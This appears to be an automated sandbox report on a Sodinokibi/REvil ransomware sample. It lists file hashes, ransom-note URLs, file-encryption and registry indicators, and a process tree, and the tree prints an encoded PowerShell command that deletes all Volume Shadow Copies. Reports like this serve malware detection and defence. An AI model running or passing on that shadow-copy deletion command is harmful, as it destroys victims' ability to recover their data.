Analysis
-
max time kernel
142s -
max time network
147s -
platform
windows10_x64 -
resource
win10 -
submitted
20-08-2020 13:03
Static task
static1
Behavioral task
behavioral1
Sample
591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe
Resource
win7
Behavioral task
behavioral2
Sample
591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe
Resource
win10
General
-
Target
591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe
-
Size
115KB
-
MD5
35766bd0b389c682306437d45ba5c4e6
-
SHA1
b837df01d31c1bfff0e54f07076323d075a4bf27
-
SHA256
591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a
-
SHA512
e20472ae28857e4dd7b021e23366623cf6b3f9a4818b09c36997b1428220d244da760ff61aaa11de690278152fb551e2a002f7ff19e1cf60ad625845772930c6
Malware Config
Extracted
C:\1g3wd8r-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/887C53C24A330C29
http://decryptor.cc/887C53C24A330C29
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Modifies extensions of user files 12 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exedescription ioc process File renamed C:\Users\Admin\Pictures\SelectGroup.png => \??\c:\users\admin\pictures\SelectGroup.png.1g3wd8r 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File renamed C:\Users\Admin\Pictures\RestartRegister.crw => \??\c:\users\admin\pictures\RestartRegister.crw.1g3wd8r 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File renamed C:\Users\Admin\Pictures\UpdateSend.crw => \??\c:\users\admin\pictures\UpdateSend.crw.1g3wd8r 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File renamed C:\Users\Admin\Pictures\WriteRead.png => \??\c:\users\admin\pictures\WriteRead.png.1g3wd8r 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File opened for modification \??\c:\users\admin\pictures\RequestPublish.tiff 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File renamed C:\Users\Admin\Pictures\NewUpdate.tif => \??\c:\users\admin\pictures\NewUpdate.tif.1g3wd8r 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File renamed C:\Users\Admin\Pictures\InitializeRename.png => \??\c:\users\admin\pictures\InitializeRename.png.1g3wd8r 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File renamed C:\Users\Admin\Pictures\MoveResolve.crw => \??\c:\users\admin\pictures\MoveResolve.crw.1g3wd8r 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File renamed C:\Users\Admin\Pictures\MeasureSubmit.raw => \??\c:\users\admin\pictures\MeasureSubmit.raw.1g3wd8r 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File renamed C:\Users\Admin\Pictures\RequestPublish.tiff => \??\c:\users\admin\pictures\RequestPublish.tiff.1g3wd8r 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File opened for modification \??\c:\users\admin\pictures\DisableExit.tiff 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File renamed C:\Users\Admin\Pictures\DisableExit.tiff => \??\c:\users\admin\pictures\DisableExit.tiff.1g3wd8r 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\k4bw98d.bmp" 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe -
Drops file in Program Files directory 15 IoCs
Processes:
591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exedescription ioc process File opened for modification \??\c:\program files\PushDismount.ps1xml 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File opened for modification \??\c:\program files\ExitMerge.scf 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File opened for modification \??\c:\program files\PublishRestore.zip 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File opened for modification \??\c:\program files\PopSync.xlt 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File opened for modification \??\c:\program files\ProtectEnter.temp 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File opened for modification \??\c:\program files\TraceCompress.wps 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File created \??\c:\program files\1g3wd8r-readme.txt 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File opened for modification \??\c:\program files\OptimizeWait.mp2 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File opened for modification \??\c:\program files\GetJoin.ttc 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File opened for modification \??\c:\program files\MovePush.wma 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File created \??\c:\program files (x86)\1g3wd8r-readme.txt 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File opened for modification \??\c:\program files\ConfirmProtect.htm 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File opened for modification \??\c:\program files\SetShow.docx 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File opened for modification \??\c:\program files\CompareApprove.js 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe File opened for modification \??\c:\program files\GroupDismount.wmf 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe -
Processes:
591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\SystemCertificates\CA\Certificates\A416002331A4E0C8C53D94AC1E0234723D8BDE97 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\SystemCertificates\CA\Certificates\A416002331A4E0C8C53D94AC1E0234723D8BDE97\Blob = 030000000100000014000000a416002331a4e0c8c53d94ac1e0234723d8bde971400000001000000140000008180d62879354a5b793589398f12176e117b2c1104000000010000001000000058bec6c6284db2ea1a8aca560691ff0f0f0000000100000020000000eed0b2ecc538897b88bde1b187557738b9d695936927b6d8c88ce131e34f675e190000000100000010000000603338adfa4a38f9199fb173f33983115c000000010000000400000000080000180000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f20000000010000007b040000308204773082035fa003020102020d01ee5f222de71b43a5d4669f9e300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3138313132313030303030305a170d3238313132313030303030305a3050310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d7361312630240603550403131d476c6f62616c5369676e205253412044562053534c204341203230313830820122300d06092a864886f70d01010105000382010f003082010a0282010100a8fb55f5fff090abffe7ef41bd683052e7fd32edc9f515f7c0b9af31709852521698d1e12d698067c56c5b7a2cf973b9ab9a85bd84336bd983af80f99dfa5290338fc0940a0a43aa3ada27a375cbd02d6a3a20dd779ffc476054356e33f4b3ba85a9f3467e6c5616e8a61e5300c6b4f28629f35b7a4030d8a8b72962ab7821c518c4dc61f9cc18963637ea4b9bcf6ecac467ab0345d75834bdbae36838fc5dc4a19082d51d3868c5d5a0a9732c9c8ab7dd70e049d70bf034c9ec3e3f754b821048691aff8bce9b1cc294ecb7dd4bd5b4e4590e188215f11bf3d8c77adac9963b57935538beb0ff20dbaf952c08bdaae3543945a31cf1f782d2cb4d61c20686250203010001a38201523082014e300e0603551d0f0101ff04040302018630270603551d250420301e06082b0601050507030106082b0601050507030206082b0601050507030930120603551d130101ff040830060101ff020100301d0603551d0e041604148180d62879354a5b793589398f12176e117b2c11301f0603551d230418301680148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc303e06082b0601050507010104323030302e06082b060105050730018622687474703a2f2f6f637370322e676c6f62616c7369676e2e636f6d2f726f6f74723330360603551d1f042f302d302ba029a0278625687474703a2f2f63726c2e676c6f62616c7369676e2e636f6d2f726f6f742d72332e63726c30470603551d200440303e303c0604551d20003034303206082b06010505070201162668747470733a2f2f7777772e676c6f62616c7369676e2e636f6d2f7265706f7369746f72792f300d06092a864886f70d01010b050003820101004205854cdd9608e64fe853a78b382d86d4373c3ae4f10e2e794058a7d1fdd467f4847b9c9d8ef6707b6c846d6224aa8eb0bb90f9ec1516d5d511a2b519e275e42b7d444bd8b24c57c0f8112dfffee3f9ac96a909866e2308659da6e4837f43a7d2b992abe37bfdd68ec9a4d7a9c92177aafe631f64aecd1e239b60737a7e29ca57866af0b65e472a85c290502d60f22eb55b8b3919448930f89a357891279095a40bfd9403180f6e5eab038f827fa2447bfebb81c9e12e87c68a5a0052985ee815ab0a5cf29d4db212f43f4504f29b62fbb5aaebc8fc042c1a9419b2f8d125b16ed60536d2584b6180b63c62bca302b6dd36633968253a7ba28ba3141b092233 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exepowershell.exepid process 2892 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe 2892 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe 3884 powershell.exe 3884 powershell.exe 3884 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 2892 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe Token: SeDebugPrivilege 3884 powershell.exe Token: SeBackupPrivilege 996 vssvc.exe Token: SeRestorePrivilege 996 vssvc.exe Token: SeAuditPrivilege 996 vssvc.exe Token: SeTakeOwnershipPrivilege 2892 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exedescription pid process target process PID 2892 wrote to memory of 3884 2892 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe powershell.exe PID 2892 wrote to memory of 3884 2892 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe"C:\Users\Admin\AppData\Local\Temp\591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3884
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:748
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:996